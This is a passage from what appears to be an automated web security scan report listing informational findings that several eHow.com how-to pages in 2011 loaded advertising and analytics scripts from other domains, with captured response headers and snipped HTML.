<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.475. http://www.ehow.com/how_3815_minutes-business-meeting.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_3815_minutes-business-meeting.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:08 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 91031

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Take Minutes at a Business Meeting | eHow.
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="canonical" href="http://www.ehow.com/how_3815_minutes-business-meeting.html" />

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js"></script>
...[SNIP]...

           <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.476. http://www.ehow.com/how_4469163_edit-pdf-document.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_4469163_edit-pdf-document.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:25 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 78875

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Edit a PDF Document | eHow.com</title>

...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="canonical" href="http://www.ehow.com/how_4469163_edit-pdf-document.html" />

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js"></script>
...[SNIP]...

           <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.477. http://www.ehow.com/how_4474239_make-graph-using-excel.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_4474239_make-graph-using-excel.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:07 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 94261

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Make a Graph Using Excel | eHow.com</title
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="canonical" href="http://www.ehow.com/how_4474239_make-graph-using-excel.html" />

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js"></script>
...[SNIP]...

           <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.478. http://www.ehow.com/how_4924781_open-pub-file-mac.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_4924781_open-pub-file-mac.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:25 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73182

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Open a Pub File on a Mac | eHow.com</title
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="canonical" href="http://www.ehow.com/how_4924781_open-pub-file-mac.html" />

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js"></script>
...[SNIP]...

           <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.479. http://www.ehow.com/how_5073161_convert-wps-file-extension.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_5073161_convert-wps-file-extension.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:25 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75085

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Convert a WPS File Extension | eHow.com</t
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="canonical" href="http://www.ehow.com/how_5073161_convert-wps-file-extension.html" />

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js"></script>
...[SNIP]...

           <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.480. http://www.ehow.com/how_5215115_change-startup-programs-windows-7.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_5215115_change-startup-programs-windows-7.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:07 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 82042

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Change Startup Programs in Windows 7 | eHo
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="canonical" href="http://www.ehow.com/how_5215115_change-startup-programs-windows-7.html" />

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js"></script>
...[SNIP]...

           <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.481. http://www.ehow.com/how_5381925_make-roof-rake.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_5381925_make-roof-rake.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:47 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 74523

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Make a Roof Rake | eHow.com</title>
       <me
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="canonical" href="http://www.ehow.com/how_5381925_make-roof-rake.html" />

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js"></script>
...[SNIP]...

           <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.482. http://www.ehow.com/how_5521182_avoid-seasonal-affective-disorder-sad.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_5521182_avoid-seasonal-affective-disorder-sad.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:34 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 87313

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Avoid SAD | eHow.com</title>
       <meta char
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="canonical" href="http://www.ehow.com/how_5521182_avoid-seasonal-affective-disorder-sad.html" />

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js"></script>
...[SNIP]...

           <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.483. http://www.ehow.com/how_5809012_create-indoor-gardens.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_5809012_create-indoor-gardens.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:34 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 78016

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Create Indoor Gardens | eHow.com</title>

...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="canonical" href="http://www.ehow.com/how_5809012_create-indoor-gardens.html" />

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js"></script>
...[SNIP]...

           <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.484. http://www.ehow.com/how_6469141_improve-english-grammar-skills.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_6469141_improve-english-grammar-skills.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:30 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 76199

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Improve English Grammar Skills | eHow.com<
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="canonical" href="http://www.ehow.com/how_6469141_improve-english-grammar-skills.html" />

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js"></script>
...[SNIP]...

           <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.485. http://www.ehow.com/how_7496527_resolve-5-common-grammar-problems.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_7496527_resolve-5-common-grammar-problems.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:13 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 82802

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Resolve 5 Common Grammar Problems | eHow.c
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="canonical" href="http://www.ehow.com/how_7496527_resolve-5-common-grammar-problems.html" />

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js"></script>
...[SNIP]...

           <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.486. http://www.ehow.com/how_7744253_attach-mini-shades-update-chandelier.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_7744253_attach-mini-shades-update-chandelier.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:30 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73658

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Attach Mini Shades to Update a Chandelier
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="canonical" href="http://www.ehow.com/how_7744253_attach-mini-shades-update-chandelier.html" />

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js"></script>
...[SNIP]...

           <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.487. http://www.ehow.com/how_7856914_prevent-chimney-fires.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_7856914_prevent-chimney-fires.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:03 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72127

<!DOCTYPE html>
